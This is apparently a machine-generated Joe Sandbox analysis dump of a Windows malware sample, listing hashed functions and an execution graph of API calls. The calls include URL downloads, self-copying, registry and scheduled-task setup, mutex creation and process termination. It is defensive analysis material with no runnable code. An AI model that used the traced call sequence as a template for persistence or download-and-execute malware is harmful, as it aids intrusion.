                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2191A37DD003199BCF20DFA8CD44BAEB7B5AF14314F180529E819E7240E775EA05CBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1783060780-0
                                                                                                                                                                                                                                        • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                                                        • Instruction ID: 396aae10abe3060a5d3a7dd5f5d6359843145221771857d131d00f844ef2903e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AA152B9C00249EBEF11EFE8DC45BDEBB76AF14314F180028D505B6291D7769648CBA7
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02892AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                                                                                        • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                                                        • Instruction ID: df3c0bec8467698afd4421e4d778388a44808ba0e0eba89b50d448fc59c7eafd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB51A27CA00209EBDF298F79888066E77E6AF40328F1C8729EC39D62D8D7749950CB41
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028B1359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction ID: 13b6d0e980badf75026a1476049bce1a7f7fe44963f62b48bbd2f49c1fa20e95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5501303A40014EBBCF135E88DC198EE3F62BF1D354B488419FA5D98630E736C5B1AB81
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02937A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 02937A4B
                                                                                                                                                                                                                                          • Part of subcall function 02938140: ___BuildCatchObjectHelper.LIBCMT ref: 02938172
                                                                                                                                                                                                                                          • Part of subcall function 02938140: ___AdjustPointer.LIBCMT ref: 02938189
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 02937A62
                                                                                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 02937A74
                                                                                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 02937A98
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction ID: ebe74f11fbbe5d8e24394de95431f9da71c6ec60b08fa55f43898c5b48f9ff1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA01D772400109BBCF13AF95CC04EEA7BBAFF89754F158014F95866120D776E961DFA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:2%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:37%
                                                                                                                                                                                                                                        Total number of Nodes:810
                                                                                                                                                                                                                                        Total number of Limit Nodes:90
                                                                                                                                                                                                                                        execution_graph 44673 423f84 44674 423f90 _ctrlevent_capture@4 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 _ctrlevent_capture@4 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c 36 API calls 2 library calls 44713->45049 44715 425146 45050 428c48 InitializeCriticalSectionAndSpinCount ___lock_fhandle 44715->45050 44717 42514b 44718 42514f 44717->44718 45052 4324f7 TlsAlloc 44717->45052 45051 4251b7 61 API calls 2 library calls 44718->45051 44721 425154 44721->44682 44722 425161 44722->44718 44723 42516c 44722->44723 45053 428c96 44723->45053 44726 4251ae 45061 4251b7 61 API calls 2 library calls 44726->45061 44729 42518d 44729->44726 44731 425193 44729->44731 44730 4251b3 44730->44682 45060 42508e 58 API calls 4 library calls 44731->45060 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 _ctrlevent_capture@4 44734->44735 45073 428af7 44735->45073 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 4287e3 GetStartupInfoW 44739->44740 44741 428783 _ctrlevent_capture@4 @_EH4_CallFilterFunc@8 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45082 4289ff LeaveCriticalSection _doexit 44742->45082 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45080 43263e InitializeCriticalSectionAndSpinCount 44749->45080 44750->44742 44750->44745 44750->44746 45081 43263e InitializeCriticalSectionAndSpinCount 44750->45081 44754 432370 44753->44754 44755 424034 44753->44755 45085 428cde 44754->45085 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___init_ctype 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44761 428cde __malloc_crt 58 API calls 44760->44761 44762 431fd8 _wparse_cmdline 44760->44762 44761->44762 44762->44693 44764 4321ba _LangCountryEnumProc@4 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 _LangCountryEnumProc@4 44765->44773 44766 43223a 45124 420bed 58 API calls 2 library calls 44766->45124 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45125 420bed 58 API calls 2 library calls 44770->45125 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45123 42962f 58 API calls __wopenfile 44773->45123 45126 4242fd 8 API calls 2 library calls 44774->45126 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45127 43aeb5 44779->45127 44780 427c92 __initterm_e 44782 427cb1 _doexit __IsNonwritableInCurrentImage 44780->44782 45130 4219ac 67 API calls __cinit 44780->45130 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45131 40cf10 44784->45131 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45355 4124e0 109 API calls _memset 44788->45355 44789->44790 45145 41d3c0 44790->45145 44793 419fb9 44793->44705 44795 41a022 45148 41d340 44795->45148 44796 41b669 45436 44f23e 59 API calls 2 library calls 44796->45436 44798 41b673 45437 44f23e 59 API calls 2 library calls 44798->45437 44803 41a065 45153 413a90 44803->45153 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45209 412220 44810->45209 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45224 40ef50 44814->45224 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45229 413ea0 44819->45229 44821 420235 60 API calls _LangCountryEnumProc@4 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45169 423c92 44824->45169 44827 41a563 44825->44827 44860 41a5db 44827->44860 45250 414690 44827->45250 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45172 411cd0 44831->45172 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45357 411a10 8 API calls 44833->45357 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45356 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45356 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45273 40d240 CoInitialize 44844->45273 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 44861 420c62 _malloc 58 API calls 44859->44861 44860->44833 44860->44838 44860->44841 44860->44848 44864 41a810 _memset 44861->44864 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45359 40e760 95 API calls 44872->45359 45358 413ff0 59 API calls ___init_ctype 44873->45358 44874->44846 44878 41a7d0 44874->44878 45723 41dbd0 95 API calls 4 library calls 44874->45723 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45724 41e690 203 API calls 8 library calls 44877->45724 44878->44846 45360 415c10 44879->45360 44881 41a98c 45375 412840 60 API calls 44881->45375 44883 41a997 45376 410fc0 93 API calls 4 library calls 44883->45376 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45377 412840 60 API calls 44890->45377 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45378 413ff0 59 API calls ___init_ctype 44900->45378 44902 41ab1d 45379 412900 44902->45379 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45384 413ff0 59 API calls ___init_ctype 44908->45384 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45385 413ff0 59 API calls ___init_ctype 44916->45385 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45386 413580 59 API calls 44921->45386 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45387 413580 59 API calls 44926->45387 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45388 413580 59 API calls 44930->45388 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45389 413580 59 API calls 44934->45389 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45390 413580 59 API calls 44938->45390 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45391 413580 59 API calls 44942->45391 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45392 413580 59 API calls 44946->45392 44948 41afe0 45393 413100 59 API calls 44948->45393 44950 41b001 45394 413580 59 API calls 44950->45394 44952 41b025 45395 413100 59 API calls 44952->45395 44954 41b03c 45396 413580 59 API calls 44954->45396 44956 41b059 45397 413100 59 API calls 44956->45397 44958 41b070 45398 413580 59 API calls 44958->45398 44960 41b07c 45399 413100 59 API calls 44960->45399 44962 41b093 45400 413580 59 API calls 44962->45400 44964 41b09f 45401 413100 59 API calls 44964->45401 44966 41b0b6 45402 413580 59 API calls 44966->45402 44968 41b0c2 45403 413100 59 API calls 44968->45403 44970 41b0d9 45404 413580 59 API calls 44970->45404 44972 41b0e5 45405 413100 59 API calls 44972->45405 44974 41b0fc 45406 413580 59 API calls 44974->45406 44976 41b108 44978 41b130 44976->44978 45407 41cdd0 59 API calls 44976->45407 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45408 412de0 59 API calls 44980->45408 44983 41b1c9 44982->44983 45409 412c40 44983->45409 44985 41b1d8 45416 412bf0 59 API calls 44985->45416 44987 41b1ea 45417 40ecb0 60 API calls 2 library calls 44987->45417 44989 41b2f5 45420 4136c0 59 API calls 44989->45420 44991 41b308 45421 40ca70 59 API calls 44991->45421 44993 41b311 45422 4130b0 59 API calls 44993->45422 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45423 40c740 120 API calls 4 library calls 44996->45423 44998 412900 60 API calls 44998->45010 44999 41b327 45424 4111c0 169 API calls 2 library calls 44999->45424 45002 41b33b 45425 41ba10 LoadCursorW RegisterClassExW 45002->45425 45004 41b343 45426 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45426 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45427 410a50 65 API calls 45007->45427 45010->44989 45010->44995 45010->44998 45010->45005 45418 413580 59 API calls 45010->45418 45419 40f1f0 59 API calls 45010->45419 45011->44884 45012 41b379 45428 413100 59 API calls 45012->45428 45014 41b3a5 45429 413580 59 API calls 45014->45429 45016 41b48b 45435 41fdc0 CreateThread 45016->45435 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45430 41c330 59 API calls 45038->45430 45431 41c240 59 API calls 45038->45431 45432 41b8b0 59 API calls 45038->45432 45433 413260 59 API calls 45038->45433 45434 41fa10 CreateThread 45038->45434 45725 427e0e 45039->45725 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45049->44715 45050->44717 45051->44721 45052->44722 45054 428c9d 45053->45054 45056 425179 45054->45056 45058 428cbb 45054->45058 45062 43b813 45054->45062 45056->44726 45059 432553 TlsSetValue 45056->45059 45058->45054 45058->45056 45070 4329c9 Sleep 45058->45070 45059->44729 45060->44733 45061->44730 45063 43b81e 45062->45063 45068 43b839 45062->45068 45064 43b82a 45063->45064 45063->45068 45071 425208 58 API calls __getptd_noexit 45064->45071 45066 43b849 HeapAlloc 45066->45068 45069 43b82f 45066->45069 45068->45066 45068->45069 45072 42793d DecodePointer 45068->45072 45069->45054 45070->45058 45071->45069 45072->45068 45074 428b1b EnterCriticalSection 45073->45074 45075 428b08 45073->45075 45074->44737 45083 428b9f 58 API calls 10 library calls 45075->45083 45077 428b0e 45077->45074 45084 427c2e 58 API calls 3 library calls 45077->45084 45080->44749 45081->44750 45082->44741 45083->45077 45087 428cec 45085->45087 45088 428d1e 45087->45088 45090 428cff 45087->45090 45091 420c62 45087->45091 45088->44757 45090->45087 45090->45088 45108 4329c9 Sleep 45090->45108 45092 420cdd 45091->45092 45100 420c6e 45091->45100 45117 42793d DecodePointer 45092->45117 45094 420ce3 45118 425208 58 API calls __getptd_noexit 45094->45118 45097 420ca1 RtlAllocateHeap 45097->45100 45107 420cd5 45097->45107 45099 420cc9 45115 425208 58 API calls __getptd_noexit 45099->45115 45100->45097 45100->45099 45104 420cc7 45100->45104 45105 420c79 45100->45105 45114 42793d DecodePointer 45100->45114 45116 425208 58 API calls __getptd_noexit 45104->45116 45105->45100 45109 427f51 58 API calls 2 library calls 45105->45109 45110 427fae 58 API calls 9 library calls 45105->45110 45111 427b0b 45105->45111 45107->45087 45108->45090 45109->45105 45110->45105 45119 427ad7 GetModuleHandleExW 45111->45119 45114->45100 45115->45104 45116->45107 45117->45094 45118->45107 45120 427af0 GetProcAddress 45119->45120 45121 427b07 ExitProcess 45119->45121 45120->45121 45122 427b02 45120->45122 45122->45121 45123->44773 45124->44768 45125->44768 45126->44776 45128 43aeb8 EncodePointer 45127->45128 45128->45128 45129 43aed2 45128->45129 45129->44780 45130->44782 45132 40cf32 _memset __ftell_nolock 45131->45132 45133 40cf4f InternetOpenW 45132->45133 45134 415c10 59 API calls 45133->45134 45135 40cf8a InternetOpenUrlW 45134->45135 45136 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45135->45136 45142 40cfb2 45135->45142 45438 4156d0 45136->45438 45138 4156d0 59 API calls 45140 40d049 45138->45140 45139 40d000 45139->45138 45140->45142 45457 413010 59 API calls 45140->45457 45142->44786 45143 40d084 45143->45142 45458 413010 59 API calls 45143->45458 45463 41ccc0 45145->45463 45483 41cc50 45148->45483 45151 41a04d 45151->44798 45151->44803 45154 413ab2 45153->45154 45155 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45153->45155 45156 413b00 45154->45156 45157 413aba 45154->45157 45163 418400 45155->45163 45491 44f23e 59 API calls 2 library calls 45156->45491 45158 423b4c 59 API calls 45157->45158 45160 413ac7 45158->45160 45160->45155 45492 44f1bb 59 API calls 3 library calls 45160->45492 45164 418437 45163->45164 45168 418446 45163->45168 45164->45168 45493 415d50 59 API calls ___init_ctype 45164->45493 45165 4184b9 45165->44811 45168->45165 45494 418d50 59 API calls 45168->45494 45495 431781 45169->45495 45513 42f7c0 45172->45513 45175 411d20 _memset 45176 411d40 RegQueryValueExW RegCloseKey 45175->45176 45177 411d8f 45176->45177 45177->45177 45178 415c10 59 API calls 45177->45178 45179 411dbf 45178->45179 45180 411dd1 lstrlenA 45179->45180 45181 411e7c 45179->45181 45515 413520 59 API calls 45180->45515 45182 411e94 6 API calls 45181->45182 45185 411ef5 UuidCreate UuidToStringW 45182->45185 45184 411df1 45186 411e3c PathFileExistsW 45184->45186 45187 411e00 45184->45187 45188 411f36 45185->45188 45186->45181 45189 411e52 45186->45189 45187->45184 45187->45186 45188->45188 45191 415c10 59 API calls 45188->45191 45190 411e6a 45189->45190 45193 414690 59 API calls 45189->45193 45199 4121d1 45190->45199 45192 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45191->45192 45194 411f98 45192->45194 45196 411fce 45192->45196 45193->45190 45195 415c10 59 API calls 45194->45195 45195->45196 45197 415c10 59 API calls 45196->45197 45198 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 45197->45198 45198->45199 45200 41207c _memset 45198->45200 45199->44840 45201 412095 6 API calls 45200->45201 45202 412115 _memset 45201->45202 45203 412109 45201->45203 45205 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45202->45205 45516 413260 59 API calls 45203->45516 45206 4121b2 45205->45206 45207 4121aa GetLastError 45205->45207 45208 4121c0 WaitForSingleObject 45206->45208 45207->45199 45208->45199 45208->45208 45210 42f7c0 __ftell_nolock 45209->45210 45211 41222d 7 API calls 45210->45211 45212 4122bd K32EnumProcesses 45211->45212 45213 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45211->45213 45214 4122d3 45212->45214 45216 4122df 45212->45216 45213->45212 45214->44814 45215 412353 45215->44814 45216->45215 45217 4122f0 OpenProcess 45216->45217 45218 412346 CloseHandle 45217->45218 45219 41230a K32EnumProcessModules 45217->45219 45218->45215 45218->45217 45219->45218 45220 41231c K32GetModuleBaseNameW 45219->45220 45517 420235 45220->45517 45222 41233e 45222->45218 45223 412345 45222->45223 45223->45218 45225 420c62 _malloc 58 API calls 45224->45225 45228 40ef6e _memset 45225->45228 45226 40efdc 45226->44819 45227 420c62 _malloc 58 API calls 45227->45228 45228->45226 45228->45227 45228->45228 45230 413f05 45229->45230 45234 413eae 45229->45234 45231 413fb1 45230->45231 45232 413f18 45230->45232 45533 44f23e 59 API calls 2 library calls 45231->45533 45235 413fbb 45232->45235 45236 413f2d 45232->45236 45237 413f3d ___init_ctype 45232->45237 45234->45230 45241 413ed4 45234->45241 45534 44f23e 59 API calls 2 library calls 45235->45534 45236->45237 45532 416760 59 API calls 2 library calls 45236->45532 45237->44819 45243 413ed9 45241->45243 45244 413eef 45241->45244 45530 413da0 59 API calls ___init_ctype 45243->45530 45531 413da0 59 API calls ___init_ctype 45244->45531 45248 413ee9 45248->44819 45249 413eff 45249->44819 45251 4146a9 45250->45251 45252 41478c 45250->45252 45253 4146b6 45251->45253 45254 4146e9 45251->45254 45537 44f26c 59 API calls 3 library calls 45252->45537 45256 4146c2 45253->45256 45257 414796 45253->45257 45258 4147a0 45254->45258 45259 4146f5 45254->45259 45535 413340 59 API calls _memmove 45256->45535 45538 44f26c 59 API calls 3 library calls 45257->45538 45539 44f23e 59 API calls 2 library calls 45258->45539 45271 414707 ___init_ctype 45259->45271 45536 416950 59 API calls 2 library calls 45259->45536 45267 4146e0 45267->44834 45271->44834 45274 40d27d CoInitializeSecurity 45273->45274 45280 40d276 45273->45280 45275 414690 59 API calls 45274->45275 45276 40d2b8 CoCreateInstance 45275->45276 45277 40d2e3 VariantInit VariantInit VariantInit VariantInit 45276->45277 45278 40da3c CoUninitialize 45276->45278 45279 40d38e VariantClear VariantClear VariantClear VariantClear 45277->45279 45278->45280 45281 40d3e2 45279->45281 45282 40d3cc CoUninitialize 45279->45282 45280->44860 45540 40b140 45281->45540 45282->45280 45285 40d3f6 45545 40b1d0 45285->45545 45287 40d422 45288 40d426 CoUninitialize 45287->45288 45289 40d43c 45287->45289 45288->45280 45290 40b140 60 API calls 45289->45290 45292 40d449 45290->45292 45293 40b1d0 SysFreeString 45292->45293 45294 40d471 45293->45294 45295 40d496 CoUninitialize 45294->45295 45296 40d4ac 45294->45296 45295->45280 45298 40b140 60 API calls 45296->45298 45353 40d8cf 45296->45353 45299 40d4d5 45298->45299 45300 40b1d0 SysFreeString 45299->45300 45301 40d4fd 45300->45301 45302 40b140 60 API calls 45301->45302 45301->45353 45303 40d5ae 45302->45303 45304 40b1d0 SysFreeString 45303->45304 45305 40d5d6 45304->45305 45306 40b140 60 API calls 45305->45306 45305->45353 45307 40d679 45306->45307 45308 40b1d0 SysFreeString 45307->45308 45309 40d6a1 45308->45309 45310 40b140 60 API calls 45309->45310 45309->45353 45311 40d6b6 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d6de 45312->45313 45314 40b140 60 API calls 45313->45314 45313->45353 45315 40d707 45314->45315 45316 40b1d0 SysFreeString 45315->45316 45317 40d72f 45316->45317 45318 40b140 60 API calls 45317->45318 45317->45353 45319 40d744 45318->45319 45320 40b1d0 SysFreeString 45319->45320 45321 40d76c 45320->45321 45321->45353 45549 423aaf GetSystemTimeAsFileTime 45321->45549 45323 40d77d 45551 423551 45323->45551 45328 412c40 59 API calls 45329 40d7b5 45328->45329 45330 412900 60 API calls 45329->45330 45331 40d7c3 45330->45331 45332 40b140 60 API calls 45331->45332 45333 40d7db 45332->45333 45334 40b1d0 SysFreeString 45333->45334 45335 40d7ff 45334->45335 45336 40b140 60 API calls 45335->45336 45335->45353 45337 40d8a3 45336->45337 45338 40b1d0 SysFreeString 45337->45338 45339 40d8cb 45338->45339 45340 40b140 60 API calls 45339->45340 45339->45353 45341 40d8ea 45340->45341 45342 40b1d0 SysFreeString 45341->45342 45343 40d912 45342->45343 45343->45353 45559 40b400 SysAllocString 45343->45559 45345 40d936 VariantInit VariantInit 45346 40b140 60 API calls 45345->45346 45347 40d985 45346->45347 45348 40b1d0 SysFreeString 45347->45348 45349 40d9e7 VariantClear VariantClear VariantClear 45348->45349 45350 40da10 45349->45350 45351 40da46 CoUninitialize 45349->45351 45563 42052a 78 API calls swprintf 45350->45563 45351->45280 45353->45278 45355->44793 45356->44837 45357->44838 45358->44874 45359->44877 45361 415c66 45360->45361 45366 415c1e 45360->45366 45362 415c76 45361->45362 45363 415cff 45361->45363 45370 415c88 ___init_ctype 45362->45370 45719 416950 59 API calls 2 library calls 45362->45719 45720 44f23e 59 API calls 2 library calls 45363->45720 45366->45361 45371 415c45 45366->45371 45370->44881 